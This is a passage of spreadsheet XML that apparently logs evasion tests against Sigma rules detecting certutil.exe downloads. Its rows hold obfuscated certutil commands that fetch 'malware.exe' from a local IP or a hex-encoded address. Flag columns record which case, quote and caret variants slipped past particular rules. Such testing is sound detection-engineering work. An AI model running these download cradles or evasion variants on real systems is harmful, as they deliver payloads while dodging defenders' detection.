          <t>cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7</t>
        </is>
      </c>
      <c r="E600" s="36" t="inlineStr">
        <is>
          <t>certutil.exe -decode	input.b64 output.exe</t>
        </is>
      </c>
      <c r="F600" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G600" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H600" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I600" s="43" t="n"/>
      <c r="J600" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K600" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="601" ht="15.75" customHeight="1" s="42">
      <c r="A601" s="43" t="n"/>
      <c r="B601" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download</t>
        </is>
      </c>
      <c r="C601" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D601" s="36" t="inlineStr">
        <is>
          <t>19b08b1c-861d-4e75-a1ef-ea0c1baf202b</t>
        </is>
      </c>
      <c r="E601" s="36" t="inlineStr">
        <is>
          <t>certutil.exe /"urlcache" -SpLIt -f ftp://192.168.1.100/malware.exe C:\ emp\malware.exe</t>
        </is>
      </c>
      <c r="F601" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G601" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H601" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I601" s="43" t="n"/>
      <c r="J601" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K601" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="602" ht="15.75" customHeight="1" s="42">
      <c r="A602" s="43" t="n"/>
      <c r="B602" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download</t>
        </is>
      </c>
      <c r="C602" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D602" s="36" t="inlineStr">
        <is>
          <t>19b08b1c-861d-4e75-a1ef-ea0c1baf202b</t>
        </is>
      </c>
      <c r="E602" s="36" t="inlineStr">
        <is>
          <t>certutil.exe /"urlcache" -splIt /"f" ftp://192.168.1.100/malware.exe C:\ emp\malware.exe</t>
        </is>
      </c>
      <c r="F602" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G602" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H602" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I602" s="43" t="n"/>
      <c r="J602" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K602" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="603" ht="15.75" customHeight="1" s="42">
      <c r="A603" s="43" t="n"/>
      <c r="B603" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download</t>
        </is>
      </c>
      <c r="C603" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D603" s="36" t="inlineStr">
        <is>
          <t>19b08b1c-861d-4e75-a1ef-ea0c1baf202b</t>
        </is>
      </c>
      <c r="E603" s="36" t="inlineStr">
        <is>
          <t>certutil.exe /"urlcache" -SPlIT -f ftp://192.168.1.100/malware.exe C:\ emp\malware.exe</t>
        </is>
      </c>
      <c r="F603" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G603" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H603" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I603" s="43" t="n"/>
      <c r="J603" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K603" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="604" ht="15.75" customHeight="1" s="42">
      <c r="A604" s="43" t="n"/>
      <c r="B604" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download</t>
        </is>
      </c>
      <c r="C604" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D604" s="36" t="inlineStr">
        <is>
          <t>19b08b1c-861d-4e75-a1ef-ea0c1baf202b</t>
        </is>
      </c>
      <c r="E604" s="36" t="inlineStr">
        <is>
          <t>certutil.exe /"urlcache" -"split" -f ftp://192.168.1.100/malware.exe C:\ emp\malware.exe</t>
        </is>
      </c>
      <c r="F604" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G604" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H604" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I604" s="36" t="n"/>
      <c r="J604" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K604" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="605" ht="15.75" customHeight="1" s="42">
      <c r="A605" s="43" t="n"/>
      <c r="B605" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download</t>
        </is>
      </c>
      <c r="C605" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D605" s="36" t="inlineStr">
        <is>
          <t>19b08b1c-861d-4e75-a1ef-ea0c1baf202b</t>
        </is>
      </c>
      <c r="E605" s="36" t="inlineStr">
        <is>
          <t>certutil.exe -"urlcache" -split -f ftp://192.168.1.100/malware.exe C:\ emp\malware.exe</t>
        </is>
      </c>
      <c r="F605" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G605" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H605" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I605" s="43" t="n"/>
      <c r="J605" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K605" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="606" ht="15.75" customHeight="1" s="42">
      <c r="A606" s="43" t="n"/>
      <c r="B606" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download</t>
        </is>
      </c>
      <c r="C606" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D606" s="36" t="inlineStr">
        <is>
          <t>19b08b1c-861d-4e75-a1ef-ea0c1baf202b</t>
        </is>
      </c>
      <c r="E606" s="36" t="inlineStr">
        <is>
          <t>certutil.exe -urlcache -split -"f" ftp://192.168.1.100/malware.exe C:\ emp\malware.exe</t>
        </is>
      </c>
      <c r="F606" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G606" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H606" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I606" s="43" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From Direct IP Via Certutil.EXE (13e6fe51-d478-4c7e-b0f2-6da9b400a829)</t>
        </is>
      </c>
      <c r="J606" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K606" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="607" ht="15.75" customHeight="1" s="42">
      <c r="A607" s="43" t="n"/>
      <c r="B607" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download</t>
        </is>
      </c>
      <c r="C607" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D607" s="36" t="inlineStr">
        <is>
          <t>19b08b1c-861d-4e75-a1ef-ea0c1baf202b</t>
        </is>
      </c>
      <c r="E607" s="36" t="inlineStr">
        <is>
          <t>certutil.exe -"urlcache" -split /"f" ftp://192.168.1.100/malware.exe C:\ emp\malware.exe</t>
        </is>
      </c>
      <c r="F607" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G607" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H607" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I607" s="43" t="n"/>
      <c r="J607" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K607" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="608" ht="15.75" customHeight="1" s="42">
      <c r="A608" s="43" t="n"/>
      <c r="B608" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download</t>
        </is>
      </c>
      <c r="C608" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D608" s="36" t="inlineStr">
        <is>
          <t>19b08b1c-861d-4e75-a1ef-ea0c1baf202b</t>
        </is>
      </c>
      <c r="E608" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c certutil.exe -url^cache -split -f http://192.168.1.100/malware.exe C:\	emp\malware.exe</t>
        </is>
      </c>
      <c r="F608" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G608" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H608" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I608" s="43" t="n"/>
      <c r="J608" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K608" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="609" ht="15.75" customHeight="1" s="42">
      <c r="A609" s="43" t="n"/>
      <c r="B609" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download</t>
        </is>
      </c>
      <c r="C609" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D609" s="36" t="inlineStr">
        <is>
          <t>19b08b1c-861d-4e75-a1ef-ea0c1baf202b</t>
        </is>
      </c>
      <c r="E609" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" certutil.exe -url^cache -SPLIT -F http://192.168.1.100/malware.exe C:\ emp\malware.exe</t>
        </is>
      </c>
      <c r="F609" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G609" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H609" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I609" s="36" t="n"/>
      <c r="J609" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K609" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="610" ht="15.75" customHeight="1" s="42">
      <c r="A610" s="43" t="n"/>
      <c r="B610" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download</t>
        </is>
      </c>
      <c r="C610" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D610" s="36" t="inlineStr">
        <is>
          <t>19b08b1c-861d-4e75-a1ef-ea0c1baf202b</t>
        </is>
      </c>
      <c r="E610" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" certutil.exe -url^cache -split -f http://192.168.1.100/malware.exe C:\ emp\malware.exe</t>
        </is>
      </c>
      <c r="F610" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G610" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H610" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I610" s="43" t="n"/>
      <c r="J610" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K610" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="611" ht="15.75" customHeight="1" s="42">
      <c r="A611" s="43" t="n"/>
      <c r="B611" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download</t>
        </is>
      </c>
      <c r="C611" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D611" s="36" t="inlineStr">
        <is>
          <t>19b08b1c-861d-4e75-a1ef-ea0c1baf202b</t>
        </is>
      </c>
      <c r="E611" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c certutil.exe -"url^cache" -"split" /"f" http://192.168.1.100/malware.exe C:\ emp\malware.exe</t>
        </is>
      </c>
      <c r="F611" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G611" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H611" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I611" s="36" t="n"/>
      <c r="J611" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K611" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="612" ht="15.75" customHeight="1" s="42">
      <c r="A612" s="43" t="n"/>
      <c r="B612" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download</t>
        </is>
      </c>
      <c r="C612" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D612" s="36" t="inlineStr">
        <is>
          <t>19b08b1c-861d-4e75-a1ef-ea0c1baf202b</t>
        </is>
      </c>
      <c r="E612" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c certutil.exe -URl^CaChe -split -f http://192.168.1.100/malware.exe C:\ emp\malware.exe</t>
        </is>
      </c>
      <c r="F612" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G612" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H612" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I612" s="36" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From Direct IP Via Certutil.EXE (13e6fe51-d478-4c7e-b0f2-6da9b400a829); Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J612" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K612" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="613" ht="15.75" customHeight="1" s="42">
      <c r="A613" s="43" t="n"/>
      <c r="B613" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download</t>
        </is>
      </c>
      <c r="C613" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D613" s="36" t="inlineStr">
        <is>
          <t>19b08b1c-861d-4e75-a1ef-ea0c1baf202b</t>
        </is>
      </c>
      <c r="E613" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" certutil.exe /"url^cache" -split -F http://192.168.1.100/malware.exe C:\ emp\malware.exe</t>
        </is>
      </c>
      <c r="F613" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G613" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H613" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I613" s="36" t="n"/>
      <c r="J613" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K613" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="614" ht="15.75" customHeight="1" s="42">
      <c r="A614" s="43" t="n"/>
      <c r="B614" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download</t>
        </is>
      </c>
      <c r="C614" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D614" s="36" t="inlineStr">
        <is>
          <t>19b08b1c-861d-4e75-a1ef-ea0c1baf202b</t>
        </is>
      </c>
      <c r="E614" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c certutil.exe -url^cache -split -f http://192.168.1.100/malware.exe C:\ emp\malware.exe</t>
        </is>
      </c>
      <c r="F614" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G614" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H614" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I614" s="43" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From Direct IP Via Certutil.EXE (13e6fe51-d478-4c7e-b0f2-6da9b400a829); Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J614" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K614" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="615" ht="15.75" customHeight="1" s="42">
      <c r="A615" s="43" t="n"/>
      <c r="B615" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download</t>
        </is>
      </c>
      <c r="C615" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D615" s="36" t="inlineStr">
        <is>
          <t>19b08b1c-861d-4e75-a1ef-ea0c1baf202b</t>
        </is>
      </c>
      <c r="E615" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /C certutil.exe -url^cache -SPlIt -f http://192.168.1.100/malware.exe C:\ emp\malware.exe</t>
        </is>
      </c>
      <c r="F615" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G615" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H615" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I615" s="36" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From Direct IP Via Certutil.EXE (13e6fe51-d478-4c7e-b0f2-6da9b400a829); Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J615" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K615" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="616" ht="15.75" customHeight="1" s="42">
      <c r="A616" s="43" t="n"/>
      <c r="B616" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download</t>
        </is>
      </c>
      <c r="C616" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D616" s="36" t="inlineStr">
        <is>
          <t>19b08b1c-861d-4e75-a1ef-ea0c1baf202b</t>
        </is>
      </c>
      <c r="E616" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /C certutil.exe -URL^CaCHe -split -f http://192.168.1.100/malware.exe C:\ emp\malware.exe</t>
        </is>
      </c>
      <c r="F616" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G616" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H616" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I616" s="36" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From Direct IP Via Certutil.EXE (13e6fe51-d478-4c7e-b0f2-6da9b400a829); Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J616" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K616" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="617" ht="15.75" customHeight="1" s="42">
      <c r="A617" s="43" t="n"/>
      <c r="B617" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download</t>
        </is>
      </c>
      <c r="C617" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D617" s="36" t="inlineStr">
        <is>
          <t>19b08b1c-861d-4e75-a1ef-ea0c1baf202b</t>
        </is>
      </c>
      <c r="E617" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" certutil.exe -"url^cache" -"split" -f http://192.168.1.100/malware.exe C:\ emp\malware.exe</t>
        </is>
      </c>
      <c r="F617" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G617" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H617" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I617" s="36" t="n"/>
      <c r="J617" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K617" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="618" ht="15.75" customHeight="1" s="42">
      <c r="A618" s="43" t="n"/>
      <c r="B618" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download</t>
        </is>
      </c>
      <c r="C618" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D618" s="36" t="inlineStr">
        <is>
          <t>19b08b1c-861d-4e75-a1ef-ea0c1baf202b</t>
        </is>
      </c>
      <c r="E618" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /C certutil.exe -UrL^CAChE -spLiT -"f" http://192.168.1.100/malware.exe C:\ emp\malware.exe</t>
        </is>
      </c>
      <c r="F618" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G618" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H618" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I618" s="36" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From Direct IP Via Certutil.EXE (13e6fe51-d478-4c7e-b0f2-6da9b400a829); Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J618" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K618" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="619" ht="15.75" customHeight="1" s="42">
      <c r="A619" s="43" t="n"/>
      <c r="B619" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download_direct_ip</t>
        </is>
      </c>
      <c r="C619" s="36" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From Direct IP Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D619" s="36" t="inlineStr">
        <is>
          <t>13e6fe51-d478-4c7e-b0f2-6da9b400a829</t>
        </is>
      </c>
      <c r="E619" s="36" t="inlineStr">
        <is>
          <t>certutil.exe -urlcache -split -f http://0xC0000201/example.txt C:\	emp\example.txt</t>
        </is>
      </c>
      <c r="F619" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G619" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H619" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I619" s="43" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J619" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K619" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="620" ht="15.75" customHeight="1" s="42">
      <c r="A620" s="43" t="n"/>
      <c r="B620" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download_direct_ip</t>
        </is>
      </c>
      <c r="C620" s="36" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From Direct IP Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D620" s="36" t="inlineStr">
        <is>
          <t>13e6fe51-d478-4c7e-b0f2-6da9b400a829</t>
        </is>
      </c>
      <c r="E620" s="36" t="inlineStr">
        <is>
          <t>certutil.exe -urlcache -sPLIt -f http://0xC0000201/example.txt C:\ emp\example.txt</t>
        </is>
      </c>
      <c r="F620" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G620" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H620" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I620" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J620" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K620" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="621" ht="15.75" customHeight="1" s="42">
      <c r="A621" s="43" t="n"/>
      <c r="B621" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download_direct_ip</t>
        </is>
      </c>
      <c r="C621" s="36" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From Direct IP Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D621" s="36" t="inlineStr">
        <is>
          <t>13e6fe51-d478-4c7e-b0f2-6da9b400a829</t>
        </is>
      </c>
      <c r="E621" s="36" t="inlineStr">
        <is>
          <t>certutil.exe -UrLCACHE /"split" -"f" http://0xC0000201/example.txt C:\ emp\example.txt</t>
        </is>
      </c>
      <c r="F621" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G621" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H621" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I621" s="43" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J621" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K621" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="622" ht="15.75" customHeight="1" s="42">
      <c r="A622" s="43" t="n"/>
      <c r="B622" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download_direct_ip</t>
        </is>
      </c>
      <c r="C622" s="36" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From Direct IP Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D622" s="36" t="inlineStr">
        <is>
          <t>13e6fe51-d478-4c7e-b0f2-6da9b400a829</t>
        </is>
      </c>
      <c r="E622" s="36" t="inlineStr">
        <is>
          <t>certutil.exe -"urlcache" -split -f http://0xC0000201/example.txt C:\ emp\example.txt</t>
        </is>
      </c>
      <c r="F622" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G622" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H622" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I622" s="43" t="n"/>
      <c r="J622" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K622" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="623" ht="15.75" customHeight="1" s="42">
      <c r="A623" s="43" t="n"/>
      <c r="B623" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download_direct_ip</t>
        </is>
      </c>
      <c r="C623" s="36" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From Direct IP Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D623" s="36" t="inlineStr">
        <is>
          <t>13e6fe51-d478-4c7e-b0f2-6da9b400a829</t>
        </is>
      </c>
      <c r="E623" s="36" t="inlineStr">
        <is>
          <t>certutil.exe -urlcache -split /"f" http://0xC0000201/example.txt C:\ emp\example.txt</t>
        </is>
      </c>
      <c r="F623" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G623" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H623" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I623" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J623" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K623" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="624" ht="15.75" customHeight="1" s="42">
      <c r="A624" s="43" t="n"/>
      <c r="B624" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download_direct_ip</t>
        </is>
      </c>
      <c r="C624" s="36" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From Direct IP Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D624" s="36" t="inlineStr">
        <is>
          <t>13e6fe51-d478-4c7e-b0f2-6da9b400a829</t>
        </is>
      </c>
      <c r="E624" s="36" t="inlineStr">
        <is>
          <t>certutil.exe /"urlcache" -SPLIT -F http://0xC0000201/example.txt C:\ emp\example.txt</t>
        </is>
      </c>
      <c r="F624" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G624" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H624" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I624" s="43" t="n"/>
      <c r="J624" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K624" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="625" ht="15.75" customHeight="1" s="42">
      <c r="A625" s="43" t="n"/>
      <c r="B625" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download_direct_ip</t>
        </is>
      </c>
      <c r="C625" s="36" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From Direct IP Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D625" s="36" t="inlineStr">
        <is>
          <t>13e6fe51-d478-4c7e-b0f2-6da9b400a829</t>
        </is>
      </c>
      <c r="E625" s="36" t="inlineStr">
        <is>
          <t>certutil.exe /"urlcache" -"split" -f http://0xC0000201/example.txt C:\ emp\example.txt</t>
        </is>
      </c>
      <c r="F625" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G625" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H625" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I625" s="43" t="n"/>
      <c r="J625" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K625" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="626" ht="15.75" customHeight="1" s="42">
      <c r="A626" s="43" t="n"/>
      <c r="B626" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download_direct_ip</t>
        </is>
      </c>
      <c r="C626" s="36" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From Direct IP Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D626" s="36" t="inlineStr">
        <is>
          <t>13e6fe51-d478-4c7e-b0f2-6da9b400a829</t>
        </is>
      </c>
      <c r="E626" s="36" t="inlineStr">
        <is>
          <t>certutil.exe -urlcache -SPliT -f http://0xC0000201/example.txt C:\ emp\example.txt</t>
        </is>
      </c>
      <c r="F626" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G626" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H626" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I626" s="43" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J626" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K626" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="627" ht="15.75" customHeight="1" s="42">
      <c r="A627" s="43" t="n"/>
      <c r="B627" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download_direct_ip</t>
        </is>
      </c>
      <c r="C627" s="36" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From Direct IP Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D627" s="36" t="inlineStr">
        <is>
          <t>13e6fe51-d478-4c7e-b0f2-6da9b400a829</t>
        </is>
      </c>
      <c r="E627" s="36" t="inlineStr">
        <is>
          <t>certutil.exe -"urlcache" -"split" /"f" http://0xC0000201/example.txt C:\ emp\example.txt</t>
